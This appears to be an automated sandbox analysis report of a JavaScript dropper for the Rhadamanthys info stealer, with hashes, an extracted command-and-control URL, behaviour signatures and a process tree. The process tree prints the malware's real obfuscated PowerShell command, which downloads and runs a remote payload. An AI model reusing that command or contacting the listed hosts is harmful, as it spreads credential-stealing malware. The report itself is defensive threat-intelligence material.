Overview

overview

10

Static

static

1

0949242082...d98.js

windows7-x64

7

0949242082...d98.js

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-12-2024 02:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js

  • Size

    82KB

  • MD5

    03844efc838d98e3a3aa6f935a2ff1db

  • SHA1

    11c08db7fa610ff1a9e2bf7fb5e34015ceceec4f

  • SHA256

    0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98

  • SHA512

    a34ed6ea22b9f6c1ebbae01d15fec736612039b6ab2d45984ef65a5cf53046be44d5e97dbb160735634c2c18103f0751782db47e5f00ace65d73591d85128928

  • SSDEEP

    768:7AK3GmGyO9RsGGx5osXrmsGaO95b9iyCfxAO111y21NHvlZupREEpRfr5onZWRUX:GZeGX2unjA06

Score
10/10
rhadamanthysdiscoveryexecutionpersistencestealer

Malware Config

Extracted

Family

rhadamanthys

C2

https://185.196.8.68:9367/ab43097ee4f6e091aed46f79/88pw46v5.ki88g

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

    stealerrhadamanthys
  • Rhadamanthys family
    rhadamanthys
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2596
      • C:\Windows\SysWOW64\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4540
      • C:\Windows\SysWOW64\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:4040
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\Users\Admin\AppData\Local\Temp\0949242082c2b9d1335b4116a3beb48762782560add525b894fa2a9aa136bd98.js
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3712
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://11-14hotelmain.blogspot.com///////chutmarao.pdf);Start-Sleep -Seconds 3;
        2⤵
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4424
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3664
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:368
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4600
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 920
            4⤵
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:1052
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2176
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 896
            4⤵
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:4556
        • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3196
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 780
            4⤵
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:412
        • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1432
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 796
            4⤵
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:2196

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER30E0.tmp.xml
      Filesize

      4KB

      MD5

      86f393ccb22bd7546cef74c01c0f2ba4

      SHA1

      c1824809545054b6e22695a093b0aea7f4759ad7

      SHA256

      98d4a9c5abbdcd32034e618707da9aef683967b220edd61ea4f13f5e415b364d

      SHA512

      2627780327b15aaf5b729cb032eaedfa20f2fbccd2003772fdc2ce579b7a037f7d2411c867a0d17a6ffec8abd28916a9bcae6893019ceb1eb1ba113144a4180a

      Download Submit

    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER316D.tmp.xml
      Filesize

      4KB

      MD5

      1ece772c238fcfee767b27e94971d42f

      SHA1

      86f186cff38657b11184cdd2817b94417907103c

      SHA256

      88daf19b72fad39156ac273ae2dc97a1a72560beffc0658d494022f7f9b4da43

      SHA512

      8a5f56bf50df6023381416a8ff4b55e54a7b655347ed0f6fe9ca86d5c1d3a35ed8b9bfb2bb1e260e796a6a409c1c078cbd7ec0abfa3d154f85943364643cfa50

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
      Filesize

      315B

      MD5

      69acc92e6df5c35cf75eded8f61ddeaa

      SHA1

      b405090a2f92f85490705dcf77a6461ad85e7e20

      SHA256

      da3437f337aca0e1f8d7b187abcd9112d88beddde8ab8ae5aa8a8ab91b6e9698

      SHA512

      9b83a6ef14372d9e229beb69c1b1ede6f348fb51925205f99f705808db6331c5aab32bd57fc786c61647cbb94f7e4bd236dc9f4fc26be4c1ffc7a35e7619a508

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_msma3kyh.1x2.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/368-64-0x00007FFDAB930000-0x00007FFDABB25000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/368-58-0x0000000008280000-0x0000000008680000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/368-33-0x0000000007610000-0x00000000076B6000-memory.dmp

      Filesize

      664KB

      Download

    • memory/368-28-0x0000000006320000-0x00000000063B2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/368-56-0x00000000076F0000-0x0000000007700000-memory.dmp

      Filesize

      64KB

      Download

    • memory/368-66-0x0000000075FD0000-0x00000000761E5000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/3664-27-0x0000000000F30000-0x0000000000FE8000-memory.dmp

      Filesize

      736KB

      Download

    • memory/3664-55-0x0000000007C70000-0x0000000008070000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/3664-22-0x0000000000400000-0x00000000004B8000-memory.dmp

      Filesize

      736KB

      Download

    • memory/3664-49-0x0000000005630000-0x0000000005638000-memory.dmp

      Filesize

      32KB

      Download

    • memory/3664-61-0x0000000075FD0000-0x00000000761E5000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/3664-59-0x00007FFDAB930000-0x00007FFDABB25000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/3664-51-0x0000000007C70000-0x0000000008070000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/3664-50-0x0000000007B20000-0x0000000007B30000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4040-76-0x0000000002CE0000-0x00000000030E0000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/4424-21-0x000001FA5D470000-0x000001FA5D48A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4424-17-0x00007FFD8D3A0000-0x00007FFD8DE61000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4424-12-0x00007FFD8D3A0000-0x00007FFD8DE61000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4424-13-0x000001FA78170000-0x000001FA78332000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/4424-20-0x000001FA5D440000-0x000001FA5D452000-memory.dmp

      Filesize

      72KB

      Download

    • memory/4424-19-0x00007FFD8D3A0000-0x00007FFD8DE61000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4424-18-0x00007FFD8D3A0000-0x00007FFD8DE61000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4424-80-0x00007FFD8D3A0000-0x00007FFD8DE61000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4424-0-0x00007FFD8D3A3000-0x00007FFD8D3A5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4424-11-0x00007FFD8D3A0000-0x00007FFD8DE61000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4424-14-0x00007FFD8D3A0000-0x00007FFD8DE61000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4424-16-0x00007FFD8D3A3000-0x00007FFD8D3A5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4424-1-0x000001FA5D590000-0x000001FA5D5B2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4540-73-0x0000000002E30000-0x0000000003230000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/4540-77-0x00007FFDAB930000-0x00007FFDABB25000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/4540-79-0x0000000075FD0000-0x00000000761E5000-memory.dmp

      Filesize

      2.1MB

      Download

    • memory/4540-67-0x0000000000FC0000-0x0000000000FC9000-memory.dmp

      Filesize

      36KB

      Download